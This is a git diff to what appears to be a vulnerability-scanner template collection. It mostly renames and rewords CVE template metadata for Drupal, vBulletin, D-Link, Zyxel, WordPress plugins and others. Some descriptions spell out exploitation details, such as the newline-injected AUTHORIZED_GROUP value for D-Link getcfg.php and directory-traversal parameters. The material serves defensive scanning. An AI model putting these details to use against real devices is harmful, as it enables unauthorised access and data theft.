2022/05/13 diff --git a/cves/2018/CVE-2018-6008.yaml b/cves/2018/CVE-2018-6008.yaml index 60ee965e86..f13dbcb2c2 100644 --- a/cves/2018/CVE-2018-6008.yaml +++ b/cves/2018/CVE-2018-6008.yaml @@ -1,10 +1,10 @@ id: CVE-2018-6008 info: - name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download + name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Retrieval author: daffainfo severity: high - description: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter. + description: Arbitrary file retrieval exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter. reference: - https://www.exploit-db.com/exploits/43913 - https://www.cvedetails.com/cve/CVE-2018-6008 diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml index 55918f1b04..fec50a358e 100644 --- a/cves/2018/CVE-2018-7600.yaml +++ b/cves/2018/CVE-2018-7600.yaml @@ -1,13 +1,13 @@ id: CVE-2018-7600 info: - name: Drupal Drupalgeddon 2 RCE + name: Drupal - Remote Code Execution author: pikpikcu severity: critical - description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or - common module configurations. + description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. reference: - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 + - https://nvd.nist.gov/vuln/detail/CVE-2018-7600 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -60,3 +60,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-7602.yaml b/cves/2018/CVE-2018-7602.yaml index d628ce24ba..6964122f03 100644 --- a/cves/2018/CVE-2018-7602.yaml +++ b/cves/2018/CVE-2018-7602.yaml @@ -1,11 +1,10 @@ id: CVE-2018-7602 info: - name: Drupal Remote Code Execution Vulnerability + name: Drupal - Remote Code Execution author: princechaddha severity: critical - description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result - in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. reference: - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py - https://nvd.nist.gov/vuln/detail/CVE-2018-7602 @@ -74,3 +73,5 @@ requests: group: 1 regex: - '' + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-7662.yaml b/cves/2018/CVE-2018-7662.yaml index 14742e7d0e..c2cfc5117d 100644 --- a/cves/2018/CVE-2018-7662.yaml +++ b/cves/2018/CVE-2018-7662.yaml @@ -1,7 +1,7 @@ id: CVE-2018-7662 info: - name: CouchCMS <= 2.0 - Full Path Disclosure + name: CouchCMS <= 2.0 - Path Disclosure author: ritikchaddha severity: medium description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. diff --git a/cves/2018/CVE-2018-9161.yaml b/cves/2018/CVE-2018-9161.yaml index 2d6099ae02..d07f2b5e66 100644 --- a/cves/2018/CVE-2018-9161.yaml +++ b/cves/2018/CVE-2018-9161.yaml @@ -4,8 +4,7 @@ info: name: PrismaWEB - Credentials Disclosure author: gy741 severity: critical - description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be - disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 @@ -33,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-9205.yaml b/cves/2018/CVE-2018-9205.yaml index 11d98cafcc..4c8ae5e70c 100644 --- a/cves/2018/CVE-2018-9205.yaml +++ b/cves/2018/CVE-2018-9205.yaml @@ -1,7 +1,7 @@ id: CVE-2018-9205 info: - name: Drupal avatar_uploader v7.x-1.0-beta8 Local File Inclusion + name: Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion author: daffainfo severity: high description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files. diff --git a/cves/2019/CVE-2019-16123.yaml b/cves/2019/CVE-2019-16123.yaml index 60bc21c9cb..891b8933e6 100644 --- a/cves/2019/CVE-2019-16123.yaml +++ b/cves/2019/CVE-2019-16123.yaml @@ -1,7 +1,7 @@ id: CVE-2019-16123 info: - name: PilusCart <= 1.4.1 - Local File Disclosure + name: PilusCart <= 1.4.1 - Arbitrary File Retrieval author: 0x_Akoko severity: high description: PilusCart versions 1.4.1 and below suffers from a file disclosure vulnerability. diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml index 2b48847efd..bf741b806c 100644 --- a/cves/2019/CVE-2019-16759.yaml +++ b/cves/2019/CVE-2019-16759.yaml @@ -1,7 +1,7 @@ id: CVE-2019-16759 info: - name: vBulletin v5.0.0-v5.5.4 Remote Command Execution + name: vBulletin v5.0.0-v5.5.4 - Remote Command Execution author: madrobot severity: critical description: vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request. diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml index 31ca656175..4fadfcfacf 100644 --- a/cves/2019/CVE-2019-17506.yaml +++ b/cves/2019/CVE-2019-17506.yaml @@ -1,11 +1,10 @@ id: CVE-2019-17506 info: - name: DLINK DIR-868L & DIR-817LW Info Leak + name: D-Link DIR-868L & DIR-817LW - Information Disclosure author: pikpikcu severity: critical - description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) - via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. + description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. reference: - https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py classification: diff --git a/cves/2019/CVE-2019-19908.yaml b/cves/2019/CVE-2019-19908.yaml index afefa998c7..6a278ed7a0 100644 --- a/cves/2019/CVE-2019-19908.yaml +++ b/cves/2019/CVE-2019-19908.yaml @@ -1,10 +1,10 @@ id: CVE-2019-19908 info: - name: phpMyChat-Plus XSS + name: phpMyChat-Plus - Cross-Site Scripting author: madrobot severity: medium - description: phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable. + description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable. reference: - https://cinzinga.github.io/CVE-2019-19908/ classification: diff --git a/cves/2019/CVE-2019-19985.yaml b/cves/2019/CVE-2019-19985.yaml index 832bbf7c41..ab25c58a3d 100644 --- a/cves/2019/CVE-2019-19985.yaml +++ b/cves/2019/CVE-2019-19985.yaml @@ -1,10 +1,10 @@ id: CVE-2019-19985 info: - name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download + name: WordPress Email Subscribers & Newsletters <4.2.2 - Arbitrary File Retrieval author: KBA@SOGETI_ESEC,madrobot,dwisiswant0 severity: medium - description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure. + description: The WordPress plugin Email Subscribers & Newsletters before 4.2.3 contains a flaw that allows unauthenticated file download and user information disclosure. reference: - https://www.exploit-db.com/exploits/48698 classification: @@ -37,4 +37,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2019/CVE-2019-20141.yaml b/cves/2019/CVE-2019-20141.yaml index 43ec04b5be..9e3ef70432 100644 --- a/cves/2019/CVE-2019-20141.yaml +++ b/cves/2019/CVE-2019-20141.yaml @@ -1,7 +1,7 @@ id: CVE-2019-20141 info: - name: Neon Dashboard - XSS Reflected + name: Neon Dashboard - Cross-Site Scripting author: knassar702 severity: medium description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. @@ -30,4 +30,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml index 568b41377e..def2a63d29 100644 --- a/cves/2019/CVE-2019-3912.yaml +++ b/cves/2019/CVE-2019-3912.yaml @@ -1,7 +1,7 @@ id: CVE-2019-3912 info: - name: LabKey Server < 18.3.0 - Open redirect + name: LabKey Server < 18.3.0 - Open Redirect author: 0x_Akoko severity: medium description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites. diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml index f6f733783a..7489a0c820 100644 --- a/cves/2019/CVE-2019-9955.yaml +++ b/cves/2019/CVE-2019-9955.yaml @@ -1,7 +1,7 @@ id: CVE-2019-9955 info: - name: Zyxel Reflected Cross-site Scripting + name: Zyxel - Reflected Cross-site Scripting author: pdteam severity: medium description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security diff --git a/cves/2020/CVE-2020-18268.yaml b/cves/2020/CVE-2020-18268.yaml index 6952e2c78c..4b2fb2686d 100644 --- a/cves/2020/CVE-2020-18268.yaml +++ b/cves/2020/CVE-2020-18268.yaml @@ -1,7 +1,7 @@ id: CVE-2020-18268 info: - name: Z-BlogPHP 1.5.2 Open redirect + name: Z-BlogPHP 1.5.2 - Open Redirect author: 0x_Akoko severity: medium description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php." diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml index 8d9da7a121..a642e28b21 100644 --- a/cves/2020/CVE-2020-22840.yaml +++ b/cves/2020/CVE-2020-22840.yaml @@ -1,7 +1,7 @@ id: CVE-2020-22840 info: - name: b2evolution CMS Open redirect + name: b2evolution CMS - Open Redirect author: geeknik severity: medium description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. diff --git a/cves/2020/CVE-2020-24391.yaml b/cves/2020/CVE-2020-24391.yaml index 97c0b1f998..d0bc0cf514 100644 --- a/cves/2020/CVE-2020-24391.yaml +++ b/cves/2020/CVE-2020-24391.yaml @@ -1,11 +1,10 @@ id: CVE-2020-24391 info: - name: Mongo-Express Remote Code Execution + name: Mongo-Express - Remote Code Execution author: leovalcante severity: critical - description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed - leading to remote code execution in the context of the node server. + description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. reference: - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/ - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index 173fe2c0d3..b7eecbd3ea 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -1,7 +1,7 @@ id: CVE-2020-24550 info: - name: CVE-2020-24550 + name: EpiServer <13.2.7 - Open Redirect author: dhiyaneshDK severity: medium description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index abb9b6e04b..57a6a48383 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml @@ -1,7 +1,7 @@ id: CVE-2020-24579 info: - name: DLINK DSL 2888a RCE + name: D-Link DSL 2888a - Remote Command Execution author: pikpikcu severity: high description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. diff --git a/cves/2020/CVE-2020-25495.yaml b/cves/2020/CVE-2020-25495.yaml index b9465d25c0..f3a93f9bfe 100644 --- a/cves/2020/CVE-2020-25495.yaml +++ b/cves/2020/CVE-2020-25495.yaml @@ -1,10 +1,10 @@ id: CVE-2020-25495 info: - name: SCO Openserver 5.0.7 - 'section' Reflected XSS + name: SCO Openserver 5.0.7 - 'section' Cross-Site scripting author: 0x_Akoko severity: medium - description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. + description: A reflected cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. reference: - https://www.exploit-db.com/exploits/49300 classification: diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index b8f5f954e6..67ed1506e4 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -1,7 +1,7 @@ id: CVE-2020-29453 info: - name: Jira Server Pre-Auth Limited Arbitrary File Read + name: Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF) author: dwisiswant0 severity: medium description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. diff --git a/cves/2020/CVE-2020-3452.yaml b/cves/2020/CVE-2020-3452.yaml index 7d146b213f..657ec3c39e 100644 --- a/cves/2020/CVE-2020-3452.yaml +++ b/cves/2020/CVE-2020-3452.yaml @@ -1,7 +1,7 @@ id: CVE-2020-3452 info: - name: CVE-2020-3452 + name: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) - Arbitrary File Retrieval author: pdteam severity: high description: | diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml index 41fd646ab8..a8705ecb15 100644 --- a/cves/2020/CVE-2020-35736.yaml +++ b/cves/2020/CVE-2020-35736.yaml @@ -1,10 +1,10 @@ id: CVE-2020-35736 info: - name: GateOne Arbitrary File Download + name: GateOne 1.1 - Arbitrary File Retrieval author: pikpikcu severity: high - description: GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. directory traversal because os.path.join is misused. + description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. directory traversal because os.path.join is incorrectly used. reference: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 @@ -28,4 +28,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2020/CVE-2020-35749.yaml b/cves/2020/CVE-2020-35749.yaml index 6acaacc696..e8e74fcf2b 100644 --- a/cves/2020/CVE-2020-35749.yaml +++ b/cves/2020/CVE-2020-35749.yaml @@ -1,7 +1,7 @@ id: CVE-2020-35749 info: - name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download + name: Simple Job Board < 2.9.4 -Arbitrary File Retrieval (Authenticated) author: cckuailong severity: high description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server diff --git a/cves/2020/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml index 1799640cac..7780f22248 100644 --- a/cves/2020/CVE-2020-36365.yaml +++ b/cves/2020/CVE-2020-36365.yaml @@ -1,7 +1,7 @@ id: CVE-2020-36365 info: - name: Smartstore < 4.1.0 - Open redirect + name: Smartstore < 4.1.0 - Open Redirect author: 0x_Akoko severity: medium description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. diff --git a/cves/2020/CVE-2020-36510.yaml b/cves/2020/CVE-2020-36510.yaml index 8ab9e80989..4d82785b67 100644 --- a/cves/2020/CVE-2020-36510.yaml +++ b/cves/2020/CVE-2020-36510.yaml @@ -5,7 +5,7 @@ info: author: veshraj severity: medium description: | - The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting + The 15Zine Wordpress theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action, leading to a reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510 diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml index 769a806db2..3b4c8d7c25 100644 --- a/cves/2020/CVE-2020-9054.yaml +++ b/cves/2020/CVE-2020-9054.yaml @@ -1,10 +1,10 @@ id: CVE-2020-9054 info: - name: ZyXEL NAS Firmware 5.21- Remote Code Execution + name: Zyxel NAS Firmware 5.21- Remote Code Execution author: dhiyaneshDk severity: critical - description: "Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2." + description: "Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2." reference: - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml index f880e7d32d..aabdc20f55 100644 --- a/cves/2020/CVE-2020-9490.yaml +++ b/cves/2020/CVE-2020-9490.yaml @@ -1,11 +1,10 @@ id: CVE-2020-9490 info: - name: CVE-2020-9490 + name: Apache HTTP Server 2.4.20-2.4.43 - HTTP/2 Cache-Digest DoS author: philippedelteil severity: high - description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource - afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers. + description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers. reference: - https://httpd.apache.org/security/vulnerabilities_24.html - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml index 7a8949b76f..2edea85ba4 100644 --- a/cves/2021/CVE-2021-21816.yaml +++ b/cves/2021/CVE-2021-21816.yaml @@ -1,10 +1,10 @@ id: CVE-2021-21816 info: - name: D-LINK DIR-3040 - Syslog Information Disclosure + name: D-Link DIR-3040 - Syslog Information Disclosure author: gy741 severity: medium - description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker + description: An information disclosure vulnerability exists in the Syslog functionality of D-Link DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 diff --git a/cves/2021/CVE-2021-24997.yaml b/cves/2021/CVE-2021-24997.yaml index fa007b398c..a63de780be 100644 --- a/cves/2021/CVE-2021-24997.yaml +++ b/cves/2021/CVE-2021-24997.yaml @@ -1,10 +1,9 @@ id: CVE-2021-24997 info: - name: CVE-2021-24997 + name: Wordpress Guppy <=1.1 - User ID Disclosure author: Evan Rubinstein - description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information - to make API requests to either get messages sent between users, or send messages posing as one user to another. + description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another. reference: - https://www.exploit-db.com/exploits/50540 - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability @@ -32,4 +31,4 @@ requests: - '"guppyUsers":' - '"userId":' - '"type":' - condition: and \ No newline at end of file + condition: and diff --git a/cves/2021/CVE-2021-25118.yaml b/cves/2021/CVE-2021-25118.yaml index b9ea12f155..e9bd5f3d07 100644 --- a/cves/2021/CVE-2021-25118.yaml +++ b/cves/2021/CVE-2021-25118.yaml @@ -1,7 +1,7 @@ id: CVE-2021-25118 info: - name: Yoast SEO < 17.3 - Unauthenticated Full Path Disclosure + name: Yoast SEO < 17.3 - Path Disclosure author: DhiyaneshDK severity: medium description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 01a8c5e671..8b67e5b577 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -1,7 +1,7 @@ id: CVE-2021-30151 info: - name: CVE-2021-30151 + name: Sidekiq 5.1.3 and 6.x-6.2.0 - Cross-Site Scripting author: DhiyaneshDk severity: medium description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. @@ -33,4 +33,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml index cc8370a850..f2125025ea 100644 --- a/cves/2021/CVE-2021-39316.yaml +++ b/cves/2021/CVE-2021-39316.yaml @@ -1,11 +1,10 @@ id: CVE-2021-39316 info: - name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download + name: Wordpress DZS Zoomsounds <= 6.50 - Arbitrary File Retrieval author: daffainfo severity: high - description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal - in the `link` parameter. + description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using a directory traversal in the `link` parameter. reference: - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316 @@ -30,4 +29,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml index b34135e53d..ab9790a110 100644 --- a/cves/2021/CVE-2021-41293.yaml +++ b/cves/2021/CVE-2021-41293.yaml @@ -1,7 +1,7 @@ id: CVE-2021-41293 info: - name: ECOA Building Automation System - Local File Disclosure + name: ECOA Building Automation System - Arbitrary File Retrieval author: 0x_Akoko severity: high description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose diff --git a/cves/2022/CVE-2022-0540.yaml b/cves/2022/CVE-2022-0540.yaml index 29a7bf8fa1..5e0d089bbb 100644 --- a/cves/2022/CVE-2022-0540.yaml +++ b/cves/2022/CVE-2022-0540.yaml @@ -1,7 +1,7 @@ id: CVE-2022-0540 info: - name: Atlassian Jira - Authentication bypass in Seraph + name: Atlassian Jira Seraph- Authentication Bypass author: DhiyaneshDK severity: critical description: | diff --git a/cves/2022/CVE-2022-1119.yaml b/cves/2022/CVE-2022-1119.yaml index 9655352d6d..788e431fa4 100644 --- a/cves/2022/CVE-2022-1119.yaml +++ b/cves/2022/CVE-2022-1119.yaml @@ -1,11 +1,11 @@ id: CVE-2022-1119 info: - name: WordPress Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download + name: WordPress Simple File List < 3.2.8 - Arbitrary File Retrieval author: random-robbie severity: high description: | - The plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which makes it possible unauthenticated attackers to supply a path to a file that will subsequently be downloaded + The Wordpress plugin is vulnerable to arbitrary file retrieval via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e diff --git a/cves/2022/CVE-2022-1221.yaml b/cves/2022/CVE-2022-1221.yaml index 1ca0d40b7e..65c2dc6a32 100644 --- a/cves/2022/CVE-2022-1221.yaml +++ b/cves/2022/CVE-2022-1221.yaml @@ -5,10 +5,12 @@ info: author: veshraj severity: medium description: | - The plugin does not sanitise and escape some parameters before outputting them back in attributes, leading to a Reflected Cross-Site Scripting. + The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting. reference: - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 + classification: + cve-id: CVE-2022-1221 metadata: verified: true tags: xss,wordpress,wp-plugin,wp,cve,cve2022 diff --git a/exposed-panels/gogs-login.yaml b/exposed-panels/gogs-login.yaml index 8a378d1088..7a95d2bd06 100644 --- a/exposed-panels/gogs-login.yaml +++ 